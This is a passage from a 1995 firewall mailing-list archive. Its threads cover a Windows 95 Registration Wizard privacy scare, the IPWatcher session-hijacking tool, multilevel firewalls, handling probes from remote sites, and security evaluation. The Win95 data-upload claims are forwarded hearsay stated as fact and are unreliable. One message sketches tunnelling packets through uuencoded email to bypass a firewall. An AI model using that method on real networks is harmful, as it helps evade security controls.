AA07806; Wed, 2 Aug 1995 07:38:37 +0500 Date: Wed, 2 Aug 1995 07:38:37 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9508021138.AA07806@pail.rssi.com> To: firewalls@greatcircle.com, sjs@sunthing.sjsinc.com Subject: Re: Huge gapping hole in Win95 X-Sun-Charset: US-ASCII Content-Length: 9631 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stefan, Have you tried it yourself? From the people in my office who have installed it and from the trade press, I get information that states this is all optional. Brad ----- Begin Included Message ----- From firewalls-owner@GreatCircle.COM Tue Aug 1 17:30:26 1995 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) To: firewalls@greatcircle.com Subject: Huge gapping hole in Win95 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks: 1). Please see the posting below my sig line from comp.risks 2). I can imagine the following scenario: - "*user*" thrilled with his new upgrade to Win95 runs out to Fry's, Egghead...and buys a modem unbeknownst to the security types. - computer is also running a TCP/IP stack and PCNFS to access all of the corporate resources behind the firewall. - "*user*" fires up MS-Network which then transmits the entire corporate filesystem topology to MicroSoft. - security types never know that internal information has been severely compromised. 3). Am I wrong here??? I find the potential for this scenario both realistic and horrifying!!!! 4). In addition to the security implications, this might actually be a way to tame the MS beast...if enough corporations get probbed in this manner, the lawyers will have lots of fun putting together a class-action lawsuit to make MS (the original home of proprietary information and disclosures) much, much poorer for stealing tradesecrets, copyrights, etc....ALAS...I love it.... 5). I think this also has implications for the MS TCP/IP port discussion that has been going on on this list recently. I.e., as the article points out, if they have your filesystem structure and you are not blocking that port, they could grab any file that they want and you would never know it... Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! ------------------------------------------------------------------------------- Date: 30 Jun 1995 07:47:48 U From: "Paul Saffo" Subject: Warning on Using Win95 >From PLS_MCI_MAIL FWD>>Warning on Using Win95 Date: 6/26/95 8:44 PM From: jbreyer@accel.com Subject: Warning on Using Win95 [Update on RISKS-17.13 item] Believe it or not, this is not Net humor but serious. It would otherwise be outstanding satire! Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week Microsoft officials confirm that beta versions of Windows 95 include a small viral routine called Registration Wizard. It interrogates every system on a network gathering intelligence on what software is being run on which machine. It then creates a complete listing of both Microsoft's and competitors' products by machine, which it reports to Microsoft when customers sign up for Microsoft's Network Services, due for launch later this year. "In Short" column, page 88, _Information Week_ magazine, May 22,1995 The implications of this action, and the attitude of Microsoft to plan such action, beggars the imagination. An update on this. A friend of mine got hold of the beta test CD of Win95, and set up a packet sniffer between his serial port and the modem. When you try out the free demo time on The Microsoft Network, it transmits your entire directory structure in background. This means that they have a list of every directory (and, potentially every file) on your machine. It would not be difficult to have something like a FileRequest from your system to theirs, without you knowing about it. This way they could get ahold of any juicy routines you've written yourself and claim them as their own if you don't have them copyrighted. Needless to say, I'm rather annoyed about this. So spread the word as far and wide as possible: Steer clear of Windows 95. = There's nothing to say that this "feature" will be removed in the final release. [GML addition: Prodigy was accused of doing something similar several years ago. In that case it was not nearly as threatening due to: 1) it was = limited to a single PC, 2) Prodigy couldn't do much with the info (i.e. they could not pursue you for copyright infringement, nor were they trying to expand into so many businesses the way Microsoft is).] ----- End Included Message ----- From firewalls-owner@GreatCircle.COM Tue Aug 1 17:30:26 1995 From: sjs@sunthing.sjsinc.com (Stefan Jon Silverman) To: firewalls@greatcircle.com Subject: Huge gapping hole in Win95 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Folks: 1). Please see the posting below my sig line from comp.risks 2). I can imagine the following scenario: - "*user*" thrilled with his new upgrade to Win95 runs out to Fry's, Egghead...and buys a modem unbeknownst to the security types. - computer is also running a TCP/IP stack and PCNFS to access all of the corporate resources behind the firewall. - "*user*" fires up MS-Network which then transmits the entire corporate filesystem topology to MicroSoft. - security types never know that internal information has been severely compromised. 3). Am I wrong here??? I find the potential for this scenario both realistic and horrifying!!!! 4). In addition to the security implications, this might actually be a way to tame the MS beast...if enough corporations get probbed in this manner, the lawyers will have lots of fun putting together a class-action lawsuit to make MS (the original home of proprietary information and disclosures) much, much poorer for stealing tradesecrets, copyrights, etc....ALAS...I love it.... 5). I think this also has implications for the MS TCP/IP port discussion that has been going on on this list recently. I.e., as the article points out, if they have your filesystem structure and you are not blocking that port, they could grab any file that they want and you would never know it... Regards, b c++'ing u, %-) sjs ------------------------------------------------------------------------------- Stefan Jon Silverman - President SJS Associates, N.A., Inc. 572 Chestnut Street Distributed Systems Architecture & Implementation San Francisco, Ca. 94133 Phone: 415 989 2741 E-mail: sjs@sjsinc.com Cell: 415 519 3494 ------------------------------------------------------------------------------- Weebles wobble, but they don't fall down!!! ------------------------------------------------------------------------------- Date: 30 Jun 1995 07:47:48 U From: "Paul Saffo" Subject: Warning on Using Win95 >From PLS_MCI_MAIL FWD>>Warning on Using Win95 Date: 6/26/95 8:44 PM From: jbreyer@accel.com Subject: Warning on Using Win95 [Update on RISKS-17.13 item] Believe it or not, this is not Net humor but serious. It would otherwise be outstanding satire! Subject: Windows 95 Warning on comp.risks [RISKS-17.13], in Information Week Microsoft officials confirm that beta versions of Windows 95 include a small viral routine called Registration Wizard. It interrogates every system on a network gathering intelligence on what software is being run on which machine. It then creates a complete listing of both Microsoft's and competitors' products by machine, which it reports to Microsoft when customers sign up for Microsoft's Network Services, due for launch later this year. "In Short" column, page 88, _Information Week_ magazine, May 22,1995 The implications of this action, and the attitude of Microsoft to plan such action, beggars the imagination. An update on this. A friend of mine got hold of the beta test CD of Win95, and set up a packet sniffer between his serial port and the modem. When you try out the free demo time on The Microsoft Network, it transmits your entire directory structure in background. This means that they have a list of every directory (and, potentially every file) on your machine. It would not be difficult to have something like a FileRequest from your system to theirs, without you knowing about it. This way they could get ahold of any juicy routines you've written yourself and claim them as their own if you don't have them copyrighted. Needless to say, I'm rather annoyed about this. So spread the word as far and wide as possible: Steer clear of Windows 95. = There's nothing to say that this "feature" will be removed in the final release. [GML addition: Prodigy was accused of doing something similar several years ago. In that case it was not nearly as threatening due to: 1) it was = limited to a single PC, 2) Prodigy couldn't do much with the info (i.e. they could not pursue you for copyright infringement, nor were they trying to expand into so many businesses the way Microsoft is).] From firewalls-owner Wed Aug 2 05:30:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA02341 for firewalls-outgoing; Wed, 2 Aug 1995 05:01:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA02318 for ; Wed, 2 Aug 1995 05:01:28 -0700 From: Cameron_A_P@ceo.sbic.co.za Received: from net4.sbic.co.za(160.117.116.51) by miles via smap (V1.3) id sma002302; Wed Aug 2 05:00:55 1995 Received: from zork.sbic.co.za by net4.sbic.co.za (5.0/SMI-SVR4) id AA05163; Wed, 2 Aug 1995 13:59:34 +0200 Received: by zork.sbic.co.za (1.00/net4) id AA00093; Wed, 2 Aug 95 13:57:42+2 Date: Wed, 2 Aug 95 13:57:42+2 Message-Id: <9508021757.AA00093@zork.sbic.co.za> To: bmanning@ISI.EDU, firewalls@Greatcircle.com Subject: Reply to: Re: IPWatcher content-length: 921 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk CEO comments: From: Cameron A P:SBIC Date: ## 08/02/95 12:12 ## Thanks That is what I thought. The Problem is that the Vendors of various Unix Systems cannot supply encryption to sites outside the USA. Preceeding Message: From: bmanning@ISI.EDU:smtp Date: ## 08/02/95 11:25 ## > > Message: > I have come accross a package on Internet Called IPWatcher. This > package renders Firewalls and Smart Cards Useless in that it allows > the person using it to Hijack and take over an established connection. > > The URL to get more Info on this package is > http://nad.infostructure.com/watcher.html > > My Question and problem is how do you prevent this from happening. > Also are there other Hacker tools that can do this. There are a number of other facilities to hijack sessions. The only way around it is end2end encryption. Then, although a session can be hijacked, it is crypted and therfore useless. --bill From firewalls-owner Wed Aug 2 06:30:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA05702 for firewalls-outgoing; Wed, 2 Aug 1995 06:22:23 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA05654 for ; Wed, 2 Aug 1995 06:22:17 -0700 Received: from kgbvax.network.com(129.191.202.58) by miles via smap (V1.3) id sma005642; Wed Aug 2 06:21:36 1995 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA01947; Wed, 2 Aug 1995 08:18:24 -0400 Date: Wed, 2 Aug 1995 08:18:24 -0400 From: Ted Doty Message-Id: <199508021218.IAA01947@kgbvax.network.com> To: njb@knoware.nl Subject: Re: Multilevel systems In-Reply-To: Mail from 'njb@knoware.nl (Niels Bjergstrom)' dated: Wed, 2 Aug 1995 01:50:28 +0200 Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 2 Aug 1995 01:50:28 +0200, njb@knoware.nl (Niels Bjergstrom) wrote: What is the difference between THE firewall and A firewall? I find it difficult to see any great conceptual difference between the protection (firewall) you install to separate parts of a WAN and the protection (firewall) you install to separate LANs. In fact, as the problems you touch upon really starts to dawn on management types I suspect that we shall be installing more firewalls between intra-organisational subnets than between internal nets and the Internet. Not if they all run at T1 speed or less. ;-) Please excuse me for getting grumpy about performance issues _again_, but this is _exactly_ the point: how can I connect my Personnel department to my corporate FDDI (or, God save us, OC-3) backbone? While it is probably correct that a single-point multilevel solution is only a viable solution in simple cases (e.g. enforced by a three-NIC router connected to the Internet to one side, to the campus network to the second, and to the university administrative network to the third), multi-point multilevel solutions (or security step solutions, whatever we should call them) seem to me to be a reasonable solution in cases where you have a number of domains interconnected, each having different security requirements. And just who _doesn't_ have multiple domains? Personnel, Finance, Senior Management (_I_ don't want to be the one to tell them that they got hacked because they weren't important enough ...) Even Universities are now worried (this is A Very Good Thing), because they have all the above PLUS grade databases. Probably only really small companies don't fit well into this paradigm. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Wed Aug 2 06:50:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA04634 for firewalls-outgoing; Wed, 2 Aug 1995 06:07:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA04577 for ; Wed, 2 Aug 1995 06:06:53 -0700 Received: from kgbvax.network.com(129.191.202.58) by miles via smap (V1.3) id sma004565; Wed Aug 2 06:06:19 1995 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id IAA01938; Wed, 2 Aug 1995 08:03:52 -0400 Date: Wed, 2 Aug 1995 08:03:52 -0400 From: Ted Doty Message-Id: <199508021203.IAA01938@kgbvax.network.com> To: kaplan@bpa.arizona.edu Subject: RE: Using miltilevel systems for firewalls In-Reply-To: Mail from 'kaplan@bpa.arizona.edu (Ray Kaplan)' dated: Tue, 1 Aug 1995 14:18:22 -0500 Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 1 Aug 1995 14:18:22 -0500, kaplan@bpa.arizona.edu (Ray Kaplan) wrote: Perhaps, by definition. One interesting question is wheather or not this is necessary to reach the goal of a trusted system. Consider that the only way we seem to know how to end up with something (anything) that works is to build it according to our best ideas, deploy it, and hack on it until it works! Maybe it has to work this way to end up with something that can actually be trusted? Note that a formally evaluated product is not necessarially hack-proof. Would an Orange Book analysis of TCP have showed the fragmented header problem? I think not. >The European ITSEC seesm to be taking a much more corporate-friendly >approach to evaluations: companies hire organizations (CLEFs) that do the >evaluation, rather than relying on a (free but overworked - and therefore >slow) NCSC. Things seem to run much faster, with much lower risk for >the corporation and (therefore) lower cost to the customers who buy the >device. Yes indeed. I have always wondered about getting into the "commercial system evaluation" business with some sort of simpler scheme that would test against the client's requirements. The problem has always been the HUGE amount of $ reguired to equip a lab. The labs that I see my clients using to test their client / server stuff before they deploy then start in the neighborhood of $1megabuck and have a staff of 10 wizards from various disiplines, plus a giazillion consultants available for piece work. Anyone got about $10mil loose that they can seed this with? ;) Evaluation is not so much about testing; rather, it is an analysis of the design of the system. In this, it is sort of like the "you know it's secure because you read the source code" done right - people actually sit down and do design reviews. Probably a lot more expensive that filling a lab with test equipment. ;-) -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Wed Aug 2 07:14:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA04087 for firewalls-outgoing; Wed, 2 Aug 1995 05:59:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA04031 for ; Wed, 2 Aug 1995 05:59:44 -0700 Received: from kgbvax.network.com(129.191.202.58) by miles via smap (V1.3) id sma004019; Wed Aug 2 05:59:00 1995 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id HAA01931; Wed, 2 Aug 1995 07:55:24 -0400 Date: Wed, 2 Aug 1995 07:55:24 -0400 From: Ted Doty Message-Id: <199508021155.HAA01931@kgbvax.network.com> To: kaplan@bpa.arizona.edu, mdr@vodka.sse.att.com Subject: Re: Re: Using miltilevel systems for firewalls In-Reply-To: Mail from 'kaplan@bpa.arizona.edu (Ray Kaplan)' dated: Tue, 1 Aug 1995 14:18:15 -0500 Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 1 Aug 1995 14:18:15, kaplan@bpa.arizona.edu (Ray Kaplan) wrote: >> 2) Most organizations are more interested in simply "getting that >> connectivity going" than they are in doing >> architecture/design/implmentation that actually meets their security policy >> (be it granular enough or not.) What I commony hear: "Security? Yeah, >> 'gimmie a little 'o that, will ya?" >Sad but true. But the new push for connectivity to the internet may >force companies to take a new look at host level security. Having thought about this for a while now, I think that the Internet is only *part* of the problem (admittedly, a big, huge, hairy part). We are not only in the "networking" revolution, but we're just getting close to completing the "computing to the masses" revolution, too. Ten years ago, the data all lived on the Mainframe, and had cypherlocks and RACF and hordes of IS folks to protect it. POLICY was simple(r) then, because there were much better access controls, and the data was centrally administered. Now we're all "Thrivng On Chaos", driving information down to the user's desktop. Heck, I'm writing this using Linux. Forget Windows 95, I get this for *free*. Remember the old saying: "Old VAXes never die, they just get clustered"? The new one is "Old 486s never die, they just become bitchin workstations with Linux/GNU/X/MUDs/etc." Management understanding of these issues is way behind. The obvious problem is Phyber Optik hacking in from the `net and looking thru the Personnel files. The less obvious problem is insuring the integrity (much less often, the privacy) of corporate data, from all threats. The risk to data is much worse than it was in the mainframe days. Consider what is NOT considered: natural disasters, hardware failures, malicious deletion or modification, accidental deletion or modification, sabatoge. Note that hackers should fall into one of these categories, and firewalls only protect against a certain, very well bounded class of these risks. (a quick note: the mainframe guys DO think about this; it's the UNIX/DOS world that doesn't.) Orange Book would help some if the evaluation process wasn't so horribly broken. They at least have done a nice job describing how to separate data. Disaster Recovery Plans cover a multitude of sins; a good centralized backup and off-site archiving system will give you a lot of leeway, security-wise. I think that maybe the issue shouldn't be phrased as "Bad old Management doesn't understand Internet Security and Firewalls" (they don't; get over it). Rather, we need to start learning corporate-speak concerning data integrity issues. Once this happens, we'll probably see some pretty decent progress. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Wed Aug 2 07:30:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08310 for firewalls-outgoing; Wed, 2 Aug 1995 07:19:49 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08224 for ; Wed, 2 Aug 1995 07:19:36 -0700 Received: from access.mbnet.mb.ca(130.179.16.143) by miles via smap (V1.3) id sma008205; Wed Aug 2 07:19:11 1995 Received: by access.mbnet.mb.ca id AA24798 (5.67b/IDA-1.4.4 for firewalls@greatcircle.com); Wed, 2 Aug 1995 09:17:31 -0500 Date: Wed, 2 Aug 1995 09:17:31 -0500 (CDT) From: Oliver Friedrichs To: Cameron_A_P@ceo.sbic.co.za Cc: firewalls@greatcircle.com Subject: Re: IPWatcher In-Reply-To: <9508021235.AA00151@zork.sbic.co.za> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 2 Aug 1995 Cameron_A_P@ceo.sbic.co.za wrote: > My Question and problem is how do you prevent this from happening. Probably the only easy way to prevent something like this is to use IP level encryption. Something smart like public/private key exchange or SKIP. > Also are there other Hacker tools that can do this. For sure. - Oliver From firewalls-owner Wed Aug 2 07:35:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA06165 for firewalls-outgoing; Wed, 2 Aug 1995 06:34:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA06114 for ; Wed, 2 Aug 1995 06:34:17 -0700 Received: from edison.eng.auburn.edu(131.204.10.13) by miles via smap (V1.3) id sma006102; Wed Aug 2 06:33:21 1995 Received: from netman.eng.auburn.edu (20663@netman.eng.auburn.edu [131.204.12.24]) by edison.eng.auburn.edu (8.6.12/8.6.4) with ESMTP id IAA05668 for ; Wed, 2 Aug 1995 08:32:19 -0500 From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id IAA20277; Wed, 2 Aug 1995 08:32:16 -0500 Date: Wed, 2 Aug 1995 08:32:16 -0500 Subject: differences in perspective - Re: Someone knocking at our door... To: firewalls@greatcircle.com Message-Id: In-Reply-To: <9506318072.AA807210209@moraine.cc.il.us> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think the whole thread on whether to notify the postmaster or not is based upon your assumptions, and the organization the attack is coming from. In the past I have found the postmasters of notified sites to be helpful, courteous, and grateful for the notification. However, most of the sites we get probed from are other academic sites. I think there would be a major difference if a prolonged attack were launched from a major corporation, or overseas. In that case, the motives would be unknown. In the case of a university, the culprit is usually some undergrad trying to apply his latest knowledge from alt.2600 or #hack to some place. In this case I think it is appropriate to notify the postmaster at the site to nip the behavior in the bud. (The postmaster can then identify and communicate with the user, if possible, and discourage him from a "life of crime" ;) ) Q: Should you notify the postmaster at a remote site? A: it depends on circumstances 1) is it an educational institution? - probably yes 2) is it an independent service provider like netcom? - probably yes 3) is it a major corporation? - possibly yes 4) #3 with attack coming from multiple machines? - possibly no 5) overseas? - probably no, but possibly yes 6) a known "den of thieves" hack site? - definitely no etc.. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu "Real programmers use cat > file.as" From firewalls-owner Wed Aug 2 08:05:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09071 for firewalls-outgoing; Wed, 2 Aug 1995 07:38:50 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09007 for ; Wed, 2 Aug 1995 07:38:42 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma008961; Wed Aug 2 07:37:43 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16907; Wed, 2 Aug 95 10:28:41 -0400 Date: Wed, 2 Aug 95 10:28:40 -0400 Message-Id: <9508021428.AA16907@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: IPWatcher Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Andrew rites: >I have come accross a package on Internet Called IPWatcher. This >package renders Firewalls and Smart Cards Useless in that it allows >the person using it to Hijack and take over an established connection. This if why I have been blathering for some time that if the link needs good authentication, then the entire link needs to be encrypted. Now just having IPWatcher will not be enough, you must also be in the right location. Still, how do you *know* someone isn't ? Back before the flood (well 1992 or so) ISPNews printed an observation of mine that OTP devices would make excellent protected seeds for link encryption and by the fact that you could communicate at all, both ends were authenticated. Then the gov shoved its foot in & was never developed. Maybe its time has come. Warmly, Padgett ps Erin is now somewhere to the west and other than needing to re-caulk the cricket over the garage and the loss of a few tomato plants, all is well. From firewalls-owner Wed Aug 2 08:07:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08199 for firewalls-outgoing; Wed, 2 Aug 1995 07:18:39 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA08175; Wed, 2 Aug 1995 07:18:35 -0700 Received: from smtpgate.gannett.com(192.234.103.2) by miles via smap (V1.3) id sma008152; Wed Aug 2 07:17:46 1995 Received: from msgate.gannett.com by smtpgate.gannett.com with smtp (Smail3.1.29.1 #1) id m0sdeUi-0000GiC; Wed, 2 Aug 95 10:10 EDT Received: by msgate.gannett.com with Microsoft Mail id <301FB32F@msgate.gannett.com>; Wed, 02 Aug 95 10:17:35 PDT From: "Robertson, Paul" To: firewalls@greatcircle.com, firewalls-owner@GreatCircle.COM Subject: the ongoing debate.. Date: Wed, 02 Aug 95 10:16:00 PDT Message-ID: <301FB32F@msgate.gannett.com> Encoding: 128 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus said: > On my machine here (switchblade.iwi.com) I'm not running >any security and it's *GREAT*! I'm not even behind a firewall! I >refuse to firewall off my own home. :) *BUT* my business papers >and processing are all done on a different machine and the only >thing you can steal from my server here is a bunch of source code >I've mostly posted to the 'net years ago. I believe that is the >*TYPICAL* Internet connection and I believe this is a perfectly >good approach. It doesn't scale real well, though. The problem with this model is that, unfortunately, users who are *used* to this approach don't seem to understand that once their machine is connected to a business network, what was a 'perfectly good approach' becomes a potential network vulnerability. Also, I would imagine that the average user doesn't have multiple machines with which to play. > If my machine were the launch console for H-bombs I'd >strip it to a point of beyond uselessness, to secure it! :) Or, if you were the typical user, you'd just download launch-hbomb-winsock.zip > The point here is that the solutions need to >match the problems. IF people who buy their computing solutions do it with >that in mind (they don't!) it's not too bad - you buy an ordinary >box for ordinary purposes and an CompaqLaunchPro for your H-bomb >console and suit the engine to the task. Most people use pliers >to drive nails, too; I know I've done it in the past. Doesn't this then imply that the solutions need to match the people as much as, if not more than the problems? Hammers are quite common, Torx[tm?] screwdrivers aren't. When the user keeps coming up against a Torx screw, he'll keep reaching for the pliers. >can get their work done. At one customer site, we started engineering a >firewall and they wanted to make *SURE* (in the sense of assurance) >that Web-based virusses could not get in. Suddenly, all the solutions >become complex, draconian, expensive -- and WORST OF ALL - you can't >use the Netscape browser anymore. Not sure that that's a bad thing [No ] :). This has always been the problem with information security. Until the Enigma, devising cyphers that were secure enough to be useful , but easy enough for an agent in the field to use was the issue. > My take is that the ACSG have been too "hard core" and >basically called for "if it's not perfect, don't do it" which >caused the market to say, "ok." and go someplace else. I totally agree. Also, most infosec people have the same mindset, it must be gubbermint brainwashing at work :) > There's just no way, with computers, to build in the >invisible redundancy that you can in a bridge. Or maybe there is? >*THAT* is my challenge to the ACSG: make the security an invisible >part of the infrastructure, like an engineer can when building a >house. What? And put us all out of business? > I can think of a number of really crude responses I'd >love to make here. :) I know several people who like to be forced >to do painful, humiliating, or just plain uncomfortable things. >But even the masochists I know could't eroticize using a B2 system. I'll skip the obvious temptation to launch into alt.erotica.tsec.systems.b2 :) >>in X code that said "hey, I know this is ugly, but I'm a graduate student >>and I don't have to care." True or not, it makes the point that building I just couldn't snip this, it's priceless. > A number of times I have talked to folks who really should >not be on the 'net. I've listened to their firewall requirements, >reviewed their designs, and recommended that they cancel the T1, >and buy everyone at the facility an account on AOL, a modem at >home, and an extended work policy that lets them spend an hour a >day at home Internetworking. Did anyone take this approach? I'm *really* interested in that answer. > Whenever I hear someone say the kind of thing you're >saying in the paragraph above, I know I am talking with >someone who has never had to put a product out under deadline, >on 4 different platforms, next week, for customers who want >to pay half what you're charging for it. Half? You musta been selling to the Goverment! > I hate to break it to you, but a lot of commercial code >is complete, unmitigated crap, too. You just don't get to see >it because it's proprietary. Look at Windows internals and then Actually, probably most of it. I'd hazard to guess that 80% of commercial programmers write sloppy code, and I'd probably be under the mark. I bet you could get hundreds of volumes of "At the last company I worked for as a developer....." stories. Good programmers write good code, the guys doing it for fun don't have deadlines, so sometimes they're less constrained that way. On the other hand, they may not have peer review (Linux, *BSD, et al. excluded). > "an answer" that is not "the best answer" is going to be >a commercial failure. It may be "the right thing" in some people's Actually, that's not true, marketing can make the worst answer profitable. >work. There's a tunnel driver for UNIX (Jeff Onions') that sets >up a virtual network interface. All packets routing to the interface >appear in /dev/tun0 for read. You simply read each packet at an >application level, uuencode, and mail. On the other end, you reverse >the process. It requires a collaborator. I don't suppose you have a URL? This could make for some interesting demonstrations at work :) -- Paul D. Robertson The above text is the author's opinion, proberts@moc1.gannett.com which may have no basis whatsoever in fact. PSB#9280 From firewalls-owner Wed Aug 2 08:36:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10151 for firewalls-outgoing; Wed, 2 Aug 1995 08:05:58 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10107 for ; Wed, 2 Aug 1995 08:05:52 -0700 Received: from svcs1.digex.net(204.91.197.224) by miles via smap (V1.3) id sma010098; Wed Aug 2 08:04:58 1995 Received: from paragon-systems.com (sundevil.paragon-systems.com [199.125.207.2]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id LAA05302; Wed, 2 Aug 1995 11:03:58 -0400 Received: from sandfiddler.paragon-systems.com by paragon-systems.com (4.1/SMI-4.1) id AA01006; Wed, 2 Aug 95 11:06:34 EDT Received: by sandfiddler.paragon-systems.com (5.x/SMI-SVR4) id AA00397; Wed, 2 Aug 1995 11:00:43 -0400 Date: Wed, 2 Aug 1995 11:00:43 -0400 From: rmck@sandfiddler.paragon-systems.com (Bob McKisson) Message-Id: <9508021500.AA00397@sandfiddler.paragon-systems.com> To: firewalls@greatcircle.com, ian@oms.co.za Subject: Re: NetSp wins Trust Award X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > The following information was forwarded to me by pro-IBM guy. I'd appreciate > > comments from the list on both NetSP and the relavence of the announcement. snip > > -------- > > SOMERS, N.Y., July 31, 1995--IBM's Resource Access Control Facility > > (RACF) and NetSP Secured Logon Coordinator were recently named as > > winners in two categories of the InfoSecurity News Readers' Trust > > Awards. > > > > The magazine's readers selected NetSP as the best network security > > product and RACF as the best platform security product in the awards > > announced in the May/June issue. Readers were asked to choose which > > product in each of 16 categories they trust the most. > > > > "These awards represent the opinions of information-security > > professionals who use these products in real-life situations," said > > Michael I. Sobol, InfoSecurity News publisher. "Our 28,000 readers > > know more about the technology and the products than anyone. These are > > the first awards to give the real experts in information security--our > > readers--a chance to name their favorite products." Hummmmmm. With all due respect to Mr. Sobol, the first thing to keep in mind when reading any of this stuff is to realize that this was put out by a media publication whose purpose for being is to generate revenue through the sale of paper and words. Whether or not the information is relevant, useful or accruate is a totally separate issue. The only time that accuracy of information and the generation of revenue "can be" linked in a trustworthy manner is by your CPA. rmck From firewalls-owner Wed Aug 2 08:59:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09773 for firewalls-outgoing; Wed, 2 Aug 1995 07:56:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09725 for ; Wed, 2 Aug 1995 07:55:53 -0700 Received: from neptune.tis.com(192.94.214.96) by miles via smap (V1.3) id sma009712; Wed Aug 2 07:55:40 1995 Received: from relay.tis.com by neptune.TIS.COM id aa04783; 2 Aug 95 10:52 EDT Received: from pluto.tis.com(192.94.214.99) by relay.tis.com via smap (g3.0.1) id xma016408; Wed, 2 Aug 95 10:44:26 -0400 Received: by tis.com (4.1/SMI-4.1) id AA05935; Wed, 2 Aug 95 10:50:15 EDT Date: Wed, 2 Aug 95 10:50:15 EDT From: Marcus J Ranum Message-Id: <9508021450.AA05935@tis.com> To: firewalls@greatcircle.com Subject: connectathon: BOGUS // testing methodologies Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm not sure the idea of a firewall connectathon is especially good. Sure, it'd help the reputations of all the consultants who'd swarm all over the thing, but would it actually help the customer? In the case of NFS, connectivity and interoperability are the main concern, so it makes sense. In a firewall, we pretty much can assume that they'll talk to eachother (somehow) -- the question is one of security. Many of the responses to the sidewinder challenge (mine among them) have pointed out that a "take a crack at it!" penetration testing methodology has more marketing than technical merit. I won't repeat the arguments other than to point out that a firewall connectathon would just be a *LOT* of useless, blind, penetration tests taking place at once. How dramatic. How silly. Even though I may be percieved sometimes as holding negative views about formal security methodologies, one thing they have got ABSOLUTELY right is that security 